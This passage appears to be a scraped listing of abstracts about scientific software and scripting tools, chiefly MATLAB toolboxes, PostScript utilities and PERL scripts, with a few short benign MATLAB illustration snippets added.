Adobe Systems Incorporated. PostScript is a registered trademark of Adobe Systems Incorporated. UNIX is a registered trademark of AT&T Bell Laboratories.
Boyd, O.S.
2006-01-01
We have created a second-order finite-difference solution to the anisotropic elastic wave equation in three dimensions and implemented the solution as an efficient Matlab script. This program allows the user to generate synthetic seismograms for three-dimensional anisotropic earth structure. The code was written for teleseismic wave propagation in the 1-0.1 Hz frequency range but is of general utility and can be used at all scales of space and time. This program was created to help distinguish among various types of lithospheric structure given the uneven distribution of sources and receivers commonly utilized in passive source seismology. Several successful implementations have resulted in a better appreciation for subduction zone structure, the fate of a transform fault with depth, lithospheric delamination, and the effects of wavefield focusing and defocusing on attenuation. Companion scripts are provided which help the user prepare input to the finite-difference solution. Boundary conditions including specification of the initial wavefield, absorption and two types of reflection are available. © 2005 Elsevier Ltd. All rights reserved.
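For readers unfamiliar with the scheme, the following is a simplified one-dimensional acoustic analogue of a second-order finite-difference update, intended only to illustrate the stencil; the code described above is three-dimensional and anisotropic elastic, and all parameters below are arbitrary assumptions.

% 1-D second-order finite-difference wave propagation (illustration only).
nx = 400; dx = 100;                 % grid points and spacing (m)
c  = 3000;                          % wave speed (m/s)
dt = 0.4 * dx / c;                  % time step satisfying the CFL condition
nt = 500;
u = zeros(nx,1); uOld = u;
src = round(nx/2);
for it = 1:nt
    lap = zeros(nx,1);
    lap(2:nx-1) = (u(3:nx) - 2*u(2:nx-1) + u(1:nx-2)) / dx^2;
    uNew = 2*u - uOld + (c*dt)^2 * lap;                     % leapfrog update
    uNew(src) = uNew(src) + exp(-((it*dt - 0.5)/0.1)^2);    % Gaussian source wavelet
    uOld = u;  u = uNew;
end
plot((0:nx-1)*dx, u); xlabel('Distance (m)'); ylabel('Displacement');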
ANLPS. Graphics Driver for PostScript Output
DOE Office of Scientific and Technical Information (OSTI.GOV)
Engert, D.E.
1987-09-01
ANLPS is a PostScript graphics device driver for use with the proprietary CA TELLAGRAF, CUECHART, and DISSPLA products. The driver allows the user to create and send text and graphics output in the Adobe Systems' PostScript page description language, which is accepted by many print devices. The PostScript output can be generated by TELLAGRAF 6.0 and DISSPLA 10.0. The files containing the PostScript output are sent to PostScript laser printers, such as the Apple LaserWriter. It is not necessary to initialize the printer, as the output for each plot is self-contained. All CA fonts are mapped to PostScript fonts, e.g., Swiss-Medium is mapped to Helvetica, and the mapping is easily changed. Hardware shading and hardware characters, area fill, and color are included. Auxiliary routines are provided which allow graphics files containing figures, logos, and diagrams to be merged with text files. The user can then position, scale, and rotate the figures on the output page in the reserved area specified.
KEGGParser: parsing and editing KEGG pathway maps in Matlab.
Arakelyan, Arsen; Nersisyan, Lilit
2013-02-15
The KEGG pathway database is a collection of manually drawn pathway maps accompanied by KGML format files intended for use in automatic analysis. KGML files, however, do not contain the information required for complete reproduction of all the events indicated in the static image of a pathway map. Several parsers and editors of KEGG pathways exist for processing KGML files. We introduce KEGGParser, a MATLAB-based tool for KEGG pathway parsing, semiautomatic fixing, editing, visualization and analysis in the MATLAB environment. It also works with Scilab. The source code is available at http://www.mathworks.com/matlabcentral/fileexchange/37561.
Sobie, Eric A
2011-09-13
This two-part lecture introduces students to the scientific computing language MATLAB. Prior computer programming experience is not required. The lectures present basic concepts of computer programming logic that tend to cause difficulties for beginners in addition to concepts that relate specifically to the MATLAB language syntax. The lectures begin with a discussion of vectors, matrices, and arrays. Because many types of biological data, such as fluorescence images and DNA microarrays, are stored as two-dimensional objects, processing these data is a form of array manipulation, and MATLAB is especially adept at handling such array objects. The students are introduced to basic commands in MATLAB, as well as built-in functions that provide useful shortcuts. The second lecture focuses on the differences between MATLAB scripts and MATLAB functions and describes when one method of programming organization might be preferable to the other. The principles are illustrated through the analysis of experimental data, specifically measurements of intracellular calcium concentration in live cells obtained using confocal microscopy.
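The script-versus-function distinction discussed in the second lecture can be summarized in a few lines; this is a minimal sketch, and the file and function names are hypothetical examples rather than part of the lecture materials.

% scriptVsFunction.m - a SCRIPT runs in the base workspace and shares every
% variable it creates with the command line; a FUNCTION (below) has its own
% workspace and explicit inputs and outputs. In releases before R2016b the
% function must live in its own file, analyze_calcium.m.
trace = 100 + 20*exp(-((1:500) - 150).^2 / 2e3);   % synthetic calcium transient
[peakF, meanF] = analyze_calcium(trace);           % call the function
fprintf('peak = %.1f, mean = %.1f\n', peakF, meanF);

function [peakF, meanF] = analyze_calcium(trace)
    peakF = max(trace);    % peak fluorescence
    meanF = mean(trace);   % mean fluorescence
end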
Sobie, Eric A.
2014-01-01
This two-part lecture introduces students to the scientific computing language MATLAB. Prior computer programming experience is not required. The lectures present basic concepts of computer programming logic that tend to cause difficulties for beginners in addition to concepts that relate specifically to the MATLAB language syntax. The lectures begin with a discussion of vectors, matrices, and arrays. Because many types of biological data, such as fluorescence images and DNA microarrays, are stored as two-dimensional objects, processing these data is a form of array manipulation, and MATLAB is especially adept at handling such array objects. The students are introduced to basic commands in MATLAB, as well as built-in functions that provide useful shortcuts. The second lecture focuses on the differences between MATLAB scripts and MATLAB functions and describes when one method of programming organization might be preferable to the other. The principles are illustrated through the analysis of experimental data, specifically measurements of intracellular calcium concentration in live cells obtained using confocal microscopy. PMID:21934110
Flight Dynamics and Control of a Morphing UAV: Bio inspired by Natural Fliers
2017-02-17
The Tornado Vortex Lattice Method (VLM) was used for aerodynamic prediction... Tornado is Vortex Lattice Method software programmed in MATLAB; it was selected due to its fast solving time and ability to be controlled through...custom MATLAB scripts. Tornado VLM models the wing as a thin sheet of discrete vortices and computes the pressure and force distributions around the wing.
The Deterministic Mine Burial Prediction System
2009-01-12
or below the water-line, initial linear and angular velocities, and fall angle relative to the mine’s axis of symmetry. Other input data needed...c. Run_DMBP.m: start-up MATLAB script for the program 2. C:\\DMBP\\DMBP_src: This directory contains source code, geotechnical databases, and...approved for public release). b. \\Impact_35: The IMPACT35 model c. \\MakeTPARfiles: scripts for creating wave height and wave period input data from
Autoplot: a Browser for Science Data on the Web
NASA Astrophysics Data System (ADS)
Faden, J.; Weigel, R. S.; West, E. E.; Merka, J.
2008-12-01
Autoplot (www.autoplot.org) is software for plotting data from many different sources and in many different file formats. Data from CDF, CEF, FITS, NetCDF, and OpenDAP can be plotted, along with many other sources such as ASCII tables and Excel spreadsheets. This is done by adapting these various data formats and APIs into a common data model that borrows from the netCDF and CDF data models. Autoplot uses a web browser metaphor to simplify use. The user specifies a parameter URL, for example a CDF file accessible via http with a parameter name appended, and the file resource is downloaded and the parameter is rendered in a scientifically meaningful way. When data span multiple files, the user can use a file name template in the URL to aggregate (combine) a set of remote files. So the problem of aggregating data across file boundaries is handled on the client side, allowing simple web servers to be used. The das2 graphics library provides rich controls for exploring the data. Scripting is supported through Python, providing not just programmatic control but also the ability to calculate new parameters in a language that will look familiar to IDL and Matlab users. Autoplot is Java-based software, and will run on most computers without a burdensome installation process. It can also be used as an applet or as a servlet that serves static images. Autoplot was developed as part of the Virtual Radiation Belt Observatory (ViRBO) project, and is also being used for the Virtual Magnetospheric Observatory (VMO). It is expected that this flexible, general-purpose plotting tool will be useful for allowing a data provider to add instant visualization capabilities to a directory of files or for general use in the Virtual Observatory environment.
Forensic Analysis of Compromised Computers
NASA Technical Reports Server (NTRS)
Wolfe, Thomas
2004-01-01
Directory Tree Analysis File Generator is a Practical Extraction and Reporting Language (PERL) script that simplifies and automates the collection of information for forensic analysis of compromised computer systems. During such an analysis, it is sometimes necessary to collect and analyze information about files on a specific directory tree. Directory Tree Analysis File Generator collects information of this type (except information about directories) and writes it to a text file. In particular, the script asks the user for the root of the directory tree to be processed, the name of the output file, and the number of subtree levels to process. The script then processes the directory tree and puts out the aforementioned text file. The format of the text file is designed to enable the submission of the file as input to a spreadsheet program, wherein the forensic analysis is performed. The analysis usually consists of sorting files and examination of such characteristics of files as ownership, time of creation, and time of most recent access, all of which characteristics are among the data included in the text file.
Digital geologic map of the Butler Peak 7.5' quadrangle, San Bernardino County, California
Miller, Fred K.; Matti, Jonathan C.; Brown, Howard J.; digital preparation by Cossette, P. M.
2000-01-01
Open-File Report 00-145 is a digital geologic map database of the Butler Peak 7.5' quadrangle that includes (1) ARC/INFO (Environmental Systems Research Institute) version 7.2.1 Patch 1 coverages, and associated tables, (2) a Portable Document Format (.pdf) file of the Description of Map Units, Correlation of Map Units chart, and an explanation of symbols used on the map, btlrpk_dcmu.pdf, (3) a Portable Document Format file of this Readme, btlrpk_rme.pdf (the Readme is also included as an ASCII file in the data package), and (4) a PostScript plot file of the map, Correlation of Map Units, and Description of Map Units on a single sheet, btlrpk.ps. No paper map is included in the Open-File report, but the PostScript plot file (number 4 above) can be used to produce one. The PostScript plot file generates a map, peripheral text, and diagrams in the editorial format of USGS Geologic Investigation Series (I-series) maps.
Semi automatic indexing of PostScript files using Medical Text Indexer in medical education.
Mollah, Shamim Ara; Cimino, Christopher
2007-10-11
At Albert Einstein College of Medicine a large part of the online lecture materials consists of PostScript files. As the collection grows it becomes essential to create a digital library with easy access to relevant sections of the lecture material that is full-text indexed; to create this index it is necessary to extract all the text from the document files that constitute the originals of the lectures. In this study we present a semiautomatic indexing method using a robust technique for extracting text from PostScript files and the National Library of Medicine's Medical Text Indexer (MTI) program for indexing the text. This model can be applied to other medical schools for indexing purposes.
Using MATLAB Software on the Peregrine System | High-Performance Computing
Learn how to run MATLAB software in batch mode on the Peregrine system. Below is an example MATLAB job in batch (non-interactive) mode. To try the example out, create both matlabTest.sub and /$USER. In this example, it is also the directory into which MATLAB will write the output file x.dat
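The page's own example files are not reproduced here; as a hypothetical reconstruction, a minimal matlabTest.m that writes the x.dat output mentioned above might look like the following, with the batch invocation shown as a comment (scheduler directives are site-specific and omitted).

% matlabTest.m - minimal non-interactive job (hypothetical reconstruction).
% A submission script would typically run it with:
%   matlab -nodisplay -nosplash -r "matlabTest; exit"
x = rand(100, 1);                 % some computation
save('x.dat', 'x', '-ascii');     % write the output file noted above
disp('matlabTest finished');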
CER_SRBAVG_Aqua-FM3-MODIS_Edition2A
Atmospheric Science Data Center
2014-07-24
... Readme Files: Readme R4-671. Software Files: Read Package (C); UNIX C shell scripts for extracting regional CERES geo and non-geo fluxes from ...
Defining Geodetic Reference Frame using Matlab®: PlatEMotion 2.0
NASA Astrophysics Data System (ADS)
Cannavò, Flavio; Palano, Mimmo
2016-03-01
We describe the main features of the developed software tool, PlatE-Motion 2.0 (PEM2), which allows inferring Euler pole parameters by inverting the observed velocities at a set of sites located on a rigid block (inverse problem). PEM2 also allows calculating the expected velocity for any point on the Earth, given an Euler pole (direct problem). PEM2 is the updated version of a previous software tool initially developed for easy-to-use file exchange with the GAMIT/GLOBK software package. The tool is developed in the Matlab® framework and, like the previous version, includes a set of MATLAB functions (m-files), GUIs (fig-files), map data files (mat-files) and a user's manual, as well as some example input files. Changes in PEM2 include (1) bug fixes, (2) improvements in the code, (3) improvements in the statistical analysis, and (4) new input/output file formats. In addition, PEM2 can now be run under the majority of operating systems. The tool is open source and freely available to the scientific community.
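The direct problem amounts to evaluating v = ω × r on a spherical Earth; the following generic sketch (not PEM2's own functions) shows the calculation for one site, with the pole and site coordinates as illustrative assumptions.

% Predicted plate velocity at a site from an Euler pole (generic sketch).
R     = 6371e3;                        % spherical Earth radius (m)
pole  = [55, -100, 0.25];              % assumed pole: lat (deg), lon (deg), rate (deg/Myr)
site  = [38, 15];                      % assumed site: lat (deg), lon (deg)
w     = deg2rad(pole(3)) / 1e6;        % rotation rate in rad/yr
omega = w * [cosd(pole(1))*cosd(pole(2)); cosd(pole(1))*sind(pole(2)); sind(pole(1))];
r     = R * [cosd(site(1))*cosd(site(2)); cosd(site(1))*sind(site(2)); sind(site(1))];
v_xyz = cross(omega, r);               % velocity in the Earth-fixed frame (m/yr)
e_hat = [-sind(site(2)); cosd(site(2)); 0];                                           % local east
n_hat = [-sind(site(1))*cosd(site(2)); -sind(site(1))*sind(site(2)); cosd(site(1))];  % local north
v_en  = 1e3 * [dot(v_xyz, e_hat), dot(v_xyz, n_hat)];                                 % mm/yr
fprintf('Predicted velocity: %.2f mm/yr E, %.2f mm/yr N\n', v_en(1), v_en(2));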
Yeast 5 – an expanded reconstruction of the Saccharomyces cerevisiae metabolic network
2012-01-01
Background Efforts to improve the computational reconstruction of the Saccharomyces cerevisiae biochemical reaction network and to refine the stoichiometrically constrained metabolic models that can be derived from such a reconstruction have continued since the first stoichiometrically constrained yeast genome scale metabolic model was published in 2003. Continuing this ongoing process, we have constructed an update to the Yeast Consensus Reconstruction, Yeast 5. The Yeast Consensus Reconstruction is a product of efforts to forge a community-based reconstruction emphasizing standards compliance and biochemical accuracy via evidence-based selection of reactions. It draws upon models published by a variety of independent research groups as well as information obtained from biochemical databases and primary literature. Results Yeast 5 refines the biochemical reactions included in the reconstruction, particularly reactions involved in sphingolipid metabolism; updates gene-reaction annotations; and emphasizes the distinction between reconstruction and stoichiometrically constrained model. Although it was not a primary goal, this update also improves the accuracy of model prediction of viability and auxotrophy phenotypes and increases the number of epistatic interactions. This update maintains an emphasis on standards compliance, unambiguous metabolite naming, and computer-readable annotations available through a structured document format. Additionally, we have developed MATLAB scripts to evaluate the model’s predictive accuracy and to demonstrate basic model applications such as simulating aerobic and anaerobic growth. These scripts, which provide an independent tool for evaluating the performance of various stoichiometrically constrained yeast metabolic models using flux balance analysis, are included as Additional files 1, 2 and 3. Conclusions Yeast 5 expands and refines the computational reconstruction of yeast metabolism and improves the predictive accuracy of a stoichiometrically constrained yeast metabolic model. It differs from previous reconstructions and models by emphasizing the distinction between the yeast metabolic reconstruction and the stoichiometrically constrained model, and makes both available as Additional file 4 and Additional file 5 and at http://yeast.sf.net/ as separate systems biology markup language (SBML) files. Through this separation, we intend to make the modeling process more accessible, explicit, transparent, and reproducible. PMID:22663945
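As a rough illustration of the kind of flux-balance calculation such scripts automate (not the paper's scripts themselves), the following sketch assumes the COBRA Toolbox is installed and the Yeast 5 SBML file has been downloaded; the file name and the oxygen-exchange reaction identifier are assumptions.

% Aerobic and approximate anaerobic growth simulation by flux balance analysis.
model = readCbModel('yeast_5_model.xml');            % assumed SBML file name
sol   = optimizeCbModel(model, 'max');               % maximize the biomass objective
fprintf('Predicted aerobic growth rate: %.3f 1/h\n', sol.f);
modelAn = changeRxnBounds(model, 'r_1992', 0, 'l');  % assumed O2 exchange reaction ID
solAn   = optimizeCbModel(modelAn, 'max');
fprintf('Predicted anaerobic growth rate: %.3f 1/h\n', solAn.f);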
DOE Office of Scientific and Technical Information (OSTI.GOV)
Kim, S; Alaei, P
2015-06-15
Purpose: To implement full/half bowtie filter models in a commercial treatment planning system (TPS) to calculate kilovoltage (kV) x-ray imaging dose of Varian On-Board Imager (OBI) cone beam CT (CBCT) system. Methods: Full/half bowtie filters of Varian OBI were created as compensator models in Pinnacle TPS (version 9.6) using Matlab software (version 2011a). The profiles of both bowtie filters were acquired from the manufacturer, imported into the Matlab system and hard coded in binary file format. A Pinnacle script was written to import each bowtie filter data into a Pinnacle treatment plan as a compensator. A kV x-ray beam model without including the compensator model was commissioned per each bowtie filter setting based on percent depth dose and lateral profile data acquired from Monte Carlo simulations. To validate the bowtie filter models, a rectangular water phantom was generated in the planning system and an anterior/posterior beam with each bowtie filter was created. Using the Pinnacle script, each bowtie filter compensator was added to the treatment plan. Lateral profile at the depth of 3cm and percent depth dose were measured using an ion chamber and compared with the data extracted from the treatment plans. Results: The kV x-ray beams for both full and half bowtie filter have been modeled in a commercial TPS. The difference of lateral and depth dose profiles between dose calculations and ion chamber measurements were within 6%. Conclusion: Both full/half bowtie filter models provide reasonable results in kV x-ray dose calculations in the water phantom. This study demonstrates the possibility of using a model-based treatment planning system to calculate the kV imaging dose for both full and half bowtie filter modes. Further study is to be performed to evaluate the models in clinical situations.
Obtaining and processing Daymet data using Python and ArcGIS
Bohms, Stefanie
2013-01-01
This set of scripts was developed to automate the process of downloading and mosaicking daily Daymet data to a user-defined extent using ArcGIS and the Python programming language. The three steps are downloading the needed Daymet tiles for the study area extent, converting the netCDF files to a TIFF raster format, and mosaicking those rasters into one file. The set of scripts is intended for all levels of experience with the Python programming language and requires no scripting by the user.
Vessel-Mounted ADCP Data Calibration and Correction
NASA Astrophysics Data System (ADS)
de Andrade, A. F.; Barreira, L. M.; Violante-Carvalho, N.
2013-05-01
A set of scripts for vessel-mounted ADCP (Acoustic Doppler Current Profiler) data processing is presented. The need for corrections to the data measured by a ship-mounted ADCP, and the complexities found during installation, implementation and identification of the tasks performed by currently available processing systems, constitute the main motivating factors for the development of a system that is more practical to use, open source, and more manageable for the user. The proposed processing system consists of a set of scripts developed in the Matlab programming language. The system is able to read the binary files provided by the data acquisition program VMDAS (Vessel Mounted Data Acquisition System), proprietary to Teledyne RD Instruments, calculate calibration factors to correct the data, and visualize the data after correction. To use the new system, it is only necessary that the ADCP data collected with the VMDAS program be in a processing directory and that Matlab be installed on the user's computer. The algorithms developed were extensively tested with ADCP data obtained during the Oceano Sul III (Southern Ocean III - OSIII) cruise, conducted by the Brazilian Navy aboard the R/V "Antares" from March 26th to May 10th 2007, in the oceanic region between the states of São Paulo and Rio Grande do Sul. To read the data, the function rdradcp.m, developed by Rich Pawlowicz and available on his website (http://www.eos.ubc.ca/~rich/#RDADCP), was used. To calculate the calibration factors, alignment error (α) and sensitivity error (β) in Water Tracking and Bottom Tracking modes, equations deduced by Joyce (1998), Pollard & Read (1989) and Trump & Marmorino (1996) were implemented in Matlab. To validate the calibration factors obtained with the new processing system, the parameters were compared with the factors provided by the CODAS (Common Ocean Data Access System, available at http://currents.soest.hawaii.edu/docs/doc/index.html) post-processing program. For the same data analyzed, the factors provided by both systems were similar. Thereafter, the values obtained were used to correct the data, and matrices with the corrected data were saved and can be plotted. The volume transport of the Brazil Current (BC) was calculated using the data corrected by the two systems; the values were quite close, confirming the quality of the correction.
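The calibration amounts to rotating the measured velocities by the alignment error α and scaling them by (1 + β); the following generic sketch applies that correction, with illustrative values and with the caveat that sign conventions differ among the cited formulations.

% Apply alignment and sensitivity corrections to measured ADCP velocities.
alpha = deg2rad(1.2);                        % assumed alignment error (rad)
beta  = 0.005;                               % assumed sensitivity (scale) error
u = randn(100,1); v = randn(100,1);          % measured east/north velocities (m/s)
w_meas = u + 1i*v;                           % complex east + i*north representation
w_corr = (1 + beta) * exp(1i*alpha) .* w_meas;
u_corr = real(w_corr);  v_corr = imag(w_corr);
plot(u, v, '.', u_corr, v_corr, 'o'); legend('measured', 'corrected');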
NASA Astrophysics Data System (ADS)
Larour, Eric; Cheng, Daniel; Perez, Gilberto; Quinn, Justin; Morlighem, Mathieu; Duong, Bao; Nguyen, Lan; Petrie, Kit; Harounian, Silva; Halkides, Daria; Hayes, Wayne
2017-12-01
Earth system models (ESMs) are becoming increasingly complex, requiring extensive knowledge and experience to deploy and use in an efficient manner. They run on high-performance architectures that are significantly different from the everyday environments that scientists use to pre- and post-process results (i.e., MATLAB, Python). This results in models that are hard to use for non-specialists and are increasingly specific in their application. It also makes them relatively inaccessible to the wider science community, not to mention to the general public. Here, we present a new software/model paradigm that attempts to bridge the gap between the science community and the complexity of ESMs by developing a new JavaScript application program interface (API) for the Ice Sheet System Model (ISSM). The aforementioned API allows cryosphere scientists to run ISSM on the client side of a web page within the JavaScript environment. When combined with a web server running ISSM (using a Python API), it enables the serving of ISSM computations in an easy and straightforward way. The deep integration and similarities between all the APIs in ISSM (MATLAB, Python, and now JavaScript) significantly shortens and simplifies the turnaround of state-of-the-art science runs and their use by the larger community. We demonstrate our approach via a new Virtual Earth System Laboratory (VESL) website (http://vesl.jpl.nasa.gov, VESL(2017)).
DOE Office of Scientific and Technical Information (OSTI.GOV)
Jiang, Zhang
GIXSGUI is a MATLAB toolbox that offers both a graphical user interface and script-based access to visualize and process grazing-incidence X-ray scattering data from nanostructures on surfaces and in thin films. It provides routine surface scattering data reduction methods such as geometric correction, one-dimensional intensity linecut, two-dimensional intensity reshaping, etc. Three-dimensional indexing is also implemented to determine the space group and lattice parameters of buried organized nanoscopic structures in supported thin films.
ERPLAB: an open-source toolbox for the analysis of event-related potentials
Lopez-Calderon, Javier; Luck, Steven J.
2014-01-01
ERPLAB toolbox is a freely available, open-source toolbox for processing and analyzing event-related potential (ERP) data in the MATLAB environment. ERPLAB is closely integrated with EEGLAB, a popular open-source toolbox that provides many EEG preprocessing steps and an excellent user interface design. ERPLAB adds to EEGLAB’s EEG processing functions, providing additional tools for filtering, artifact detection, re-referencing, and sorting of events, among others. ERPLAB also provides robust tools for averaging EEG segments together to create averaged ERPs, for creating difference waves and other recombinations of ERP waveforms through algebraic expressions, for filtering and re-referencing the averaged ERPs, for plotting ERP waveforms and scalp maps, and for quantifying several types of amplitudes and latencies. ERPLAB’s tools can be accessed either from an easy-to-learn graphical user interface or from MATLAB scripts, and a command history function makes it easy for users with no programming experience to write scripts. Consequently, ERPLAB provides both ease of use and virtually unlimited power and flexibility, making it appropriate for the analysis of both simple and complex ERP experiments. Several forms of documentation are available, including a detailed user’s guide, a step-by-step tutorial, a scripting guide, and a set of video-based demonstrations. PMID:24782741
ERPLAB: an open-source toolbox for the analysis of event-related potentials.
Lopez-Calderon, Javier; Luck, Steven J
2014-01-01
ERPLAB toolbox is a freely available, open-source toolbox for processing and analyzing event-related potential (ERP) data in the MATLAB environment. ERPLAB is closely integrated with EEGLAB, a popular open-source toolbox that provides many EEG preprocessing steps and an excellent user interface design. ERPLAB adds to EEGLAB's EEG processing functions, providing additional tools for filtering, artifact detection, re-referencing, and sorting of events, among others. ERPLAB also provides robust tools for averaging EEG segments together to create averaged ERPs, for creating difference waves and other recombinations of ERP waveforms through algebraic expressions, for filtering and re-referencing the averaged ERPs, for plotting ERP waveforms and scalp maps, and for quantifying several types of amplitudes and latencies. ERPLAB's tools can be accessed either from an easy-to-learn graphical user interface or from MATLAB scripts, and a command history function makes it easy for users with no programming experience to write scripts. Consequently, ERPLAB provides both ease of use and virtually unlimited power and flexibility, making it appropriate for the analysis of both simple and complex ERP experiments. Several forms of documentation are available, including a detailed user's guide, a step-by-step tutorial, a scripting guide, and a set of video-based demonstrations.
Formatting scripts with computers and Extended BASIC.
Menning, C B
1984-02-01
A computer program, written in the language of Extended BASIC, is presented which enables scripts, for educational media, to be quickly written in a nearly unformatted style. From the resulting script file, stored on magnetic tape or disk, the computer program formats the script into either a storyboard, a presentation, or a narrator's script. Script headings and page and paragraph numbers are automatic features in the word processing. Suggestions are given for making personal modifications to the computer program.
Modules based on the geochemical model PHREEQC for use in scripting and programming languages
Charlton, Scott R.; Parkhurst, David L.
2011-01-01
The geochemical model PHREEQC is capable of simulating a wide range of equilibrium reactions between water and minerals, ion exchangers, surface complexes, solid solutions, and gases. It also has a general kinetic formulation that allows modeling of nonequilibrium mineral dissolution and precipitation, microbial reactions, decomposition of organic compounds, and other kinetic reactions. To facilitate use of these reaction capabilities in scripting languages and other models, PHREEQC has been implemented in modules that easily interface with other software. A Microsoft COM (component object model) has been implemented, which allows PHREEQC to be used by any software that can interface with a COM server—for example, Excel®, Visual Basic®, Python, or MATLAB®. PHREEQC has been converted to a C++ class, which can be included in programs written in C++. The class also has been compiled in libraries for Linux and Windows that allow PHREEQC to be called from C++, C, and Fortran. A limited set of methods implements the full reaction capabilities of PHREEQC for each module. Input methods use strings or files to define reaction calculations in exactly the same formats used by PHREEQC. Output methods provide a table of user-selected model results, such as concentrations, activities, saturation indices, and densities. The PHREEQC module can add geochemical reaction capabilities to surface-water, groundwater, and watershed transport models. It is possible to store and manipulate solution compositions and reaction information for many cells within the module. In addition, the object-oriented nature of the PHREEQC modules simplifies implementation of parallel processing for reactive-transport models. The PHREEQC COM module may be used in scripting languages to fit parameters; to plot PHREEQC results for field, laboratory, or theoretical investigations; or to develop new models that include simple or complex geochemical calculations.
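A minimal sketch of driving the COM module from MATLAB, assuming the IPhreeqcCOM server is registered and the phreeqc.dat database is on the search path; the ProgID, method names, and input string below are illustrative assumptions to be checked against the distribution's examples.

% Run a simple speciation calculation through the PHREEQC COM module.
iph = actxserver('IPhreeqcCOM.Object');      % assumed ProgID of the COM server
iph.LoadDatabase('phreeqc.dat');
inp = sprintf(['SOLUTION 1\n  temp 25\n  pH 7\n  Ca 1\n  C(4) 2\n' ...
               'SELECTED_OUTPUT\n  -pH\n  -saturation_indices Calcite\nEND\n']);
iph.RunString(inp);
out = iph.GetSelectedOutputArray();          % headings row plus result rows
disp(out);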
Modules based on the geochemical model PHREEQC for use in scripting and programming languages
Charlton, S.R.; Parkhurst, D.L.
2011-01-01
The geochemical model PHREEQC is capable of simulating a wide range of equilibrium reactions between water and minerals, ion exchangers, surface complexes, solid solutions, and gases. It also has a general kinetic formulation that allows modeling of nonequilibrium mineral dissolution and precipitation, microbial reactions, decomposition of organic compounds, and other kinetic reactions. To facilitate use of these reaction capabilities in scripting languages and other models, PHREEQC has been implemented in modules that easily interface with other software. A Microsoft COM (component object model) has been implemented, which allows PHREEQC to be used by any software that can interface with a COM server, for example, Excel®, Visual Basic®, Python, or MATLAB®. PHREEQC has been converted to a C++ class, which can be included in programs written in C++. The class also has been compiled in libraries for Linux and Windows that allow PHREEQC to be called from C++, C, and Fortran. A limited set of methods implements the full reaction capabilities of PHREEQC for each module. Input methods use strings or files to define reaction calculations in exactly the same formats used by PHREEQC. Output methods provide a table of user-selected model results, such as concentrations, activities, saturation indices, and densities. The PHREEQC module can add geochemical reaction capabilities to surface-water, groundwater, and watershed transport models. It is possible to store and manipulate solution compositions and reaction information for many cells within the module. In addition, the object-oriented nature of the PHREEQC modules simplifies implementation of parallel processing for reactive-transport models. The PHREEQC COM module may be used in scripting languages to fit parameters; to plot PHREEQC results for field, laboratory, or theoretical investigations; or to develop new models that include simple or complex geochemical calculations. © 2011.
Accounting Data to Web Interface Using PERL
DOE Office of Scientific and Technical Information (OSTI.GOV)
Hargeaves, C
2001-08-13
This document will explain the process to create a web interface for the accounting information generated by the High Performance Storage Systems (HPSS) accounting report feature. The accounting report contains useful data but it is not easily accessed in a meaningful way. The accounting report is the only way to see summarized storage usage information. The first step is to take the accounting data, make it meaningful and store the modified data in persistent databases. The second step is to generate the various user interfaces, HTML pages, that will be used to access the data. The third step is to transfer all required files to the web server. The web pages pass parameters to Common Gateway Interface (CGI) scripts that generate dynamic web pages and graphs. The end result is a web page with specific information presented in text with or without graphs. The accounting report has a specific format that allows the use of regular expressions to verify if a line is storage data. Each storage data line is stored in a detailed database file with a name that includes the run date. The detailed database is used to create a summarized database file that also uses run date in its name. The summarized database is used to create the group.html web page that includes a list of all storage users. Scripts that query the database folder to build a list of available databases generate two additional web pages. A master script that is run monthly as part of a cron job, after the accounting report has completed, manages all of these individual scripts. All scripts are written in the PERL programming language. Whenever possible data manipulation scripts are written as filters. All scripts are written to be single source, which means they will function properly on both the open and closed networks at LLNL. The master script handles the command line inputs for all scripts, file transfers to the web server and records run information in a log file. The rest of the scripts manipulate the accounting data or use the files created to generate HTML pages. Each script will be described in detail herein. The following is a brief description of HPSS taken directly from an HPSS web site. "HPSS is a major development project, which began in 1993 as a Cooperative Research and Development Agreement (CRADA) between government and industry. The primary objective of HPSS is to move very large data objects between high performance computers, workstation clusters, and storage libraries at speeds many times faster than is possible with today's software systems. For example, HPSS can manage parallel data transfers from multiple network-connected disk arrays at rates greater than 1 Gbyte per second, making it possible to access high definition digitized video in real time." The HPSS accounting report is a canned report whose format is controlled by the HPSS developers.
NASA Astrophysics Data System (ADS)
Verkaik, J.
2013-12-01
The Netherlands Hydrological Instrument (NHI) model predicts water demands in periods of drought, supporting the Dutch decision makers in taking operational as well as long-term decisions with respect to the water supply. Other applications of NHI are predicting fresh-salt interaction, nutrient loadings, and agriculture change. The NHI model consists of several coupled models: a saturated groundwater model (MODFLOW), an unsaturated groundwater model (MetaSWAP), a sub-catchment surface water model (MOZART), and a distribution network of surface waters model (DM/SOBEK). Each of these models requires specific, usually large, input data that may be the result of sophisticated schematization workflows. Input data can also be dependent on each other, for example, the precipitation data is input for the unsaturated zone model (cells) as well as for the surface water models (polygons). For efficient data management, we developed several Python tools such that the modeler or stakeholder can use the model in a user-friendly manner, and data is managed in a consistent, transparent and reproducible way. Two open source Python tools are presented here: the data version control module for the workflow manager VisTrails called FileSync, and the NHI model control script that uses FileSync. VisTrails is an open-source scientific workflow and provenance management system that provides support for simulations, data exploration and visualization. Since VisTrails does not directly support version control we developed a version control module called FileSync. With this generic module, the user can synchronize data from and to his workflow through a dialog window. The FileSync dialog calls the FileSync script that is command-line based and performs the actual data synchronization. This script allows the user to easily create a model repository, upload and download data, create releases and define scenarios. The data synchronization approach applied here differs from systems as Subversion or Git, since these systems do not perform well for large (binary) model data files. For this reason, a new concept of parameterization and data splitting has been implemented. Each file, or set of files, is uniquely labeled as a parameter, and for this parameter metadata is maintained by Subversion. The metadata data contains file hashes to identify data content and the location where the actual bulk data are stored that can be reached by FTP. The NHI model control script is a command-line driven Python script for pre-processing, running, and post-processing the NHI model and uses one single configuration file for all computational kernels. This configuration file is an easy-to-use, keyword-driven, Windows INI-file, having separate sections for all the kernels. It also includes a FileSync data section where the user can specify version controlled model data to be used as input. The NHI control script keeps all the data consistent during the pre-processing. Furthermore, this script is able to do model state handling when the NHI model is used for ensemble forecasting.
AutoMicromanager: A microscopy scripting toolkit for LABVIEW and other programming environments
NASA Astrophysics Data System (ADS)
Ashcroft, Brian Alan; Oosterkamp, Tjerk
2010-11-01
